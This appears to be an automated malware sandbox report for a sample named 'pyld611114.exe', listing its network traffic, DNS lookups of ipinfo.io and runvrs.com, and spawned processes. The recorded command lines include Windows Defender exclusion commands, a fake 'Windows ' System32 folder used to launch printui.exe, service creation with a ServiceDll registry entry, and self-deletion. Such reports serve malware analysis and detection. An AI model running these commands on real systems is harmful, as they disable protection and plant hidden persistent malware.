                                                                                          Dec 18, 2024 12:43:17.693082094 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:17.967792988 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:17.967820883 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:17.967878103 CET500385432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:17.968628883 CET500385432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:17.968713045 CET500385432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:18.088217020 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:18.088304043 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:18.361896038 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:18.415725946 CET500385432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:18.685825109 CET500385432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:18.808476925 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:19.083985090 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:19.090745926 CET500385432192.168.2.6188.116.21.204
                                                                                          Dec 18, 2024 12:43:19.210251093 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:19.484534025 CET543250038188.116.21.204192.168.2.6
                                                                                          Dec 18, 2024 12:43:19.528800964 CET500385432192.168.2.6188.116.21.204

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 18, 2024 12:41:45.604899883 CET6315253192.168.2.61.1.1.1
                                                                                          Dec 18, 2024 12:41:45.742803097 CET53631521.1.1.1192.168.2.6
                                                                                          Dec 18, 2024 12:41:57.177160025 CET6009953192.168.2.61.1.1.1
                                                                                          Dec 18, 2024 12:41:57.854649067 CET53600991.1.1.1192.168.2.6
                                                                                          Dec 18, 2024 12:42:03.762830019 CET5415053192.168.2.61.1.1.1
                                                                                          Dec 18, 2024 12:42:03.899835110 CET53541501.1.1.1192.168.2.6
                                                                                          Dec 18, 2024 12:42:09.937596083 CET6486053192.168.2.61.1.1.1
                                                                                          Dec 18, 2024 12:42:10.074666023 CET53648601.1.1.1192.168.2.6

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Dec 18, 2024 12:41:45.604899883 CET192.168.2.61.1.1.10xdbeeStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                          Dec 18, 2024 12:41:57.177160025 CET192.168.2.61.1.1.10x9839Standard query (0)runvrs.comA (IP address)IN (0x0001)false
                                                                                          Dec 18, 2024 12:42:03.762830019 CET192.168.2.61.1.1.10xea78Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                          Dec 18, 2024 12:42:09.937596083 CET192.168.2.61.1.1.10x5cd0Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Dec 18, 2024 12:41:07.109026909 CET1.1.1.1192.168.2.60xae90No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                          Dec 18, 2024 12:41:07.109026909 CET1.1.1.1192.168.2.60xae90No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                          Dec 18, 2024 12:41:09.602693081 CET1.1.1.1192.168.2.60x6072No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                          Dec 18, 2024 12:41:09.602693081 CET1.1.1.1192.168.2.60x6072No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                          Dec 18, 2024 12:41:45.742803097 CET1.1.1.1192.168.2.60xdbeeNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                          Dec 18, 2024 12:41:57.854649067 CET1.1.1.1192.168.2.60x9839No error (0)runvrs.com188.116.21.204A (IP address)IN (0x0001)false
                                                                                          Dec 18, 2024 12:42:03.899835110 CET1.1.1.1192.168.2.60xea78No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                          Dec 18, 2024 12:42:10.074666023 CET1.1.1.1192.168.2.60x5cd0No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                          Dec 18, 2024 12:42:10.074666023 CET1.1.1.1192.168.2.60x5cd0No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                          Dec 18, 2024 12:42:10.074666023 CET1.1.1.1192.168.2.60x5cd0No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                          Dec 18, 2024 12:42:10.074666023 CET1.1.1.1192.168.2.60x5cd0No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false

                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:06:41:12
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Users\user\Desktop\pyld611114.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\pyld611114.exe"
                                                                                          Imagebase:0x7ff668320000
                                                                                          File size:15'180'800 bytes
                                                                                          MD5 hash:43BCE45D873189F9AE2767D89A1C46E0
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:06:41:15
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:06:41:15
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:06:41:16
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:10
                                                                                          Start time:06:41:28
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:11
                                                                                          Start time:06:41:28
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:12
                                                                                          Start time:06:41:28
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\usvcinsta64.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\usvcinsta64.exe"
                                                                                          Imagebase:0x7ff792960000
                                                                                          File size:14'693'888 bytes
                                                                                          MD5 hash:11DDC0A34BAC7AB099D2EE8D9817BF58
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 83%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:13
                                                                                          Start time:06:41:29
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld611114.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:14
                                                                                          Start time:06:41:29
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:15
                                                                                          Start time:06:41:29
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\timeout.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:timeout /t 10 /nobreak
                                                                                          Imagebase:0x7ff790ae0000
                                                                                          File size:32'768 bytes
                                                                                          MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:16
                                                                                          Start time:06:41:29
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:17
                                                                                          Start time:06:41:29
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:18
                                                                                          Start time:06:41:29
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:19
                                                                                          Start time:06:41:30
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                          Imagebase:0x7ff7403e0000
                                                                                          File size:55'320 bytes
                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:20
                                                                                          Start time:06:41:33
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:21
                                                                                          Start time:06:41:33
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:22
                                                                                          Start time:06:41:33
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:23
                                                                                          Start time:06:41:36
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c mkdir "\\?\C:\Windows \System32"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:24
                                                                                          Start time:06:41:36
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:25
                                                                                          Start time:06:41:36
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "C:\Windows \System32\printui.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:26
                                                                                          Start time:06:41:36
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:27
                                                                                          Start time:06:41:36
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows \System32\printui.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows \System32\printui.exe"
                                                                                          Imagebase:0x7ff63f420000
                                                                                          File size:64'000 bytes
                                                                                          MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 0%, ReversingLabs
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:28
                                                                                          Start time:06:41:37
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:29
                                                                                          Start time:06:41:37
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:30
                                                                                          Start time:06:41:37
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:31
                                                                                          Start time:06:41:37
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:32
                                                                                          Start time:06:41:37
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\timeout.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:timeout /t 10 /nobreak
                                                                                          Imagebase:0x7ff790ae0000
                                                                                          File size:32'768 bytes
                                                                                          MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:33
                                                                                          Start time:06:41:37
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:37
                                                                                          Start time:06:41:44
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f && sc start x816796
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:38
                                                                                          Start time:06:41:44
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:39
                                                                                          Start time:06:41:44
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
                                                                                          Imagebase:0x7ff64c730000
                                                                                          File size:72'192 bytes
                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:40
                                                                                          Start time:06:41:44
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\reg.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f
                                                                                          Imagebase:0x7ff7833c0000
                                                                                          File size:77'312 bytes
                                                                                          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:41
                                                                                          Start time:06:41:44
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:sc start x816796
                                                                                          Imagebase:0x7ff64c730000
                                                                                          File size:72'192 bytes
                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:42
                                                                                          Start time:06:41:44
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\svchost.exe -k DcomLaunch
                                                                                          Imagebase:0x7ff7403e0000
                                                                                          File size:55'320 bytes
                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:43
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:44
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:45
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\console_zero.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\console_zero.exe"
                                                                                          Imagebase:0x7ff71fa00000
                                                                                          File size:477'696 bytes
                                                                                          MD5 hash:74CF33F8C2FCB56F749AAF411B9AE302
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 71%, ReversingLabs
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:46
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c schtasks /delete /tn "console_zero" /f
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:47
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:48
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:schtasks /delete /tn "console_zero" /f
                                                                                          Imagebase:0x7ff78f510000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:49
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

